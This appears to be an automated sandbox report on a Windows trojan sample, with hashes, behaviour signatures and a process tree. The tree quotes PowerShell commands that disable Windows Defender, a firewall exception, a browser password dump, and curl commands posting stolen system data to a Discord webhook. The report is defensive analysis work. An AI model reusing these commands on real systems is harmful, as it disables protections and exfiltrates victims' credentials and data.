Analysis
-
max time kernel
151s -
max time network
153s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
21/03/2021, 17:36
General
-
Target
SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe
-
Size
12.6MB
-
MD5
897aabd3ac16050d62b8aacf85541454
-
SHA1
db2fd7fb1de3b602d7ba17da0d0b1ad4f6e552c9
-
SHA256
1d2ca907c73941dfcd91aa2ef0b96ecc137146be0dfd654e52f9408100f8fbbb
-
SHA512
10bc9fcb25e2991141fe279a7815c59f06b0213046f957b4637dcfd9c31473a7b7428db5844fe0f7a36c0320ca933f335d7edea5167d8960ad37e1f0860f200a
Score
10/10
Malware Config
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
-
Nirsoft 2 IoCs
-
Executes dropped EXE 7 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
-
Gathers system information 1 TTPs 8 IoCs
Runs systeminfo.exe.
-
Modifies registry class 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 48 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe"1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\Disable.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\SysWOW64\WScript.exe" "C:\Windows\Disable.vbs" /elevate3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\Machos1.exe"C:\Windows\Machos1.exe"2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\temp\finalres.vbs"3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\temp\finalres2.vbs"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\temp\finalres.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\temp\curl.exeC:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**Hey Machos. Extraction was successful.**\"}" https://discordapp.com/api/webhooks/812010029556432946/cR78AVIHBOdzVZKLTZyxTYPyO8Zxl7AHlImj-qXIF6Ue767lT1m1Gsek0tpc8FRIm7sC6⤵
- Executes dropped EXE
-
-
C:\temp\curl.exeC:/temp/curl "https://myexternalip.com/raw"6⤵
- Executes dropped EXE
-
-
C:\temp\WebBrowserPassView.exeC:/temp/WebBrowserPassView.exe /stext "C:/temp/Admin_Passwords.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
-
-
C:\Windows\system32\findstr.exefindstr /c:"Host Name"6⤵
-
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
-
-
C:\Windows\system32\findstr.exefindstr /c:"Domain"6⤵
-
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
-
-
C:\Windows\system32\findstr.exefindstr /c:"OS Name"6⤵
-
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
-
-
C:\Windows\system32\findstr.exefindstr /c:"OS Version"6⤵
-
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
-
-
C:\Windows\system32\findstr.exefindstr /c:"System Manufacturer"6⤵
-
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
-
-
C:\Windows\system32\findstr.exefindstr /c:"System Model"6⤵
-
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
-
-
C:\Windows\system32\findstr.exefindstr /c:"System type"6⤵
-
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
-
-
C:\Windows\system32\findstr.exefindstr /c:"Total Physical Memory"6⤵
-
-
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get size6⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get serialnumber6⤵
-
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name6⤵
-
-
C:\temp\curl.exeC:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**Admin**\n```asciidoc\nTime and Date :: Sun 03/21/2021 18:41:05.86\nIP Address :: 154.61.71.13\nWindows Info :: Product Name: Windows 10 Pro, Product ID: 00331-10000-00001-AA148, Installed Key: W269N-WFGWX-YVC9B-4J6C9-T83GX\n```\n\"}" https://discordapp.com/api/webhooks/812010029556432946/cR78AVIHBOdzVZKLTZyxTYPyO8Zxl7AHlImj-qXIF6Ue767lT1m1Gsek0tpc8FRIm7sC6⤵
- Executes dropped EXE
-
-
C:\temp\filed.exe"C:\temp\filed.exe" --processStart filed.exe6⤵
- Executes dropped EXE
-
-
C:\Windows\system32\timeout.exetimeout 56⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
C:\Windows\System.exe"C:\Windows\System.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\System.exe" "System.exe" ENABLE3⤵
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
32KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
204KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB